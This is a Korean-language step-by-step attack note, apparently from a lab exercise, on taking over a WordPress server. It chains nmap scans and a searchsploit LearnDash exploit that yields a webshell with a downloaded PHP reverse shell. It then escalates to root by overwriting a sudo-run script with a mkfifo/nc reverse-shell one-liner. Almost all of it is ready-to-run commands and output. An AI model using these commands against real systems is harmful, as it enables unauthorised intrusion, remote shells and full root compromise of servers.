2022-548.kalilinux.searchsploit.wordpress

# 1단계. 정보확인

nmap -sV ip # 포트 스캔

nmap -p- -sV ip # 전체 포트 스캔

 

searchsploit wordpress | grep -i "learndash" | grep -i ".py" # searchsploit 으로 해킹 가능 목록 검색. 특히 py 실행으로 콘솔획득 목표. grep RCE 로 Remote Code Execution 획득.

 

cp /usr/share/exploitdb/exploits/php/webapps/12345.py ./exploit.py # 12345.py 은 샘플

 

python exploit.py # 사용법부터 확인

 

python exploit.py http://192.168.11.10 # 사용법대로 실행. 192.168.11.10 은 해킹할 서버 ip. WebShell을 획득

> RCE $ ls

리스트....

> RCE $ id # 현재 일반 사용자. 루트 획득 필요.

uid=33( www-data ) gid=33( www-data ) groups=33( www-data )

 

 

# 2 단계. 악성 php reverse shell 올려서 실제 쉘 얻기

 

Local> google.php reverse shell.pentestmonkey/php-reverse-shell.php 로컬 다운로드후  php-reverse-shell.php 편집해서 ip를 로컬ip로, port 를 7777 로 수정후 저장

 

Local> python3 -m http.server 5555

 

WebShell> wget http://localhostip:5555/php-reverse-shell.php

> RCE $ ls

# php-reverse-shell.php # 이 파일이 보여야 함.

> RCE $ pwd

# 현재 위치 확인

 

Local> nc -nlvp 7777

# 서버에서 Local:7777 로 접속하기를 기다린다.

 

<Chrome> http://192.168.11.10/bootstrap/img/php-reverse-shell.php

# 서버에서 Local:7777 로 접속하게 하고, nc 가 터미널을 사용할 수 있도록 해준다.

 

nc$ python3 -c "import pty;pty.spawn('/bin/bash')"

# Local.nc.터미널 접속후, bash 획득하기

 

nc$ sudo -l # sudo 로 실행시 root 암호 묻지 않고 실행해주는 목록 확인

(ALL) NOPASSWD: /usr/bin/perl /home/user/backup.pl

 

nc$ cat /home/user/backup.pl # root 권한임

#! /usr/bin/perl

system("sh", "/etc/copy.sh");

 

nc$ cat /etc/copy.sh # backup.pl 로부터 상속받아 root 권한이 될수 있는게 copy.sh. 아래 내용을 copy.sh 에 넣어야 함.

# rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|bin/sh -i 2>&1|nc local내ip 4444 >/tmp/f

echo "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|bin/sh -i 2>&1|nc local내ip 4444 >/tmp/f" > /etc/copy.sh

 

Local> nc -nlvp 4444

 

nc$ sudo /usr/bin/perl /home/user/backup.pl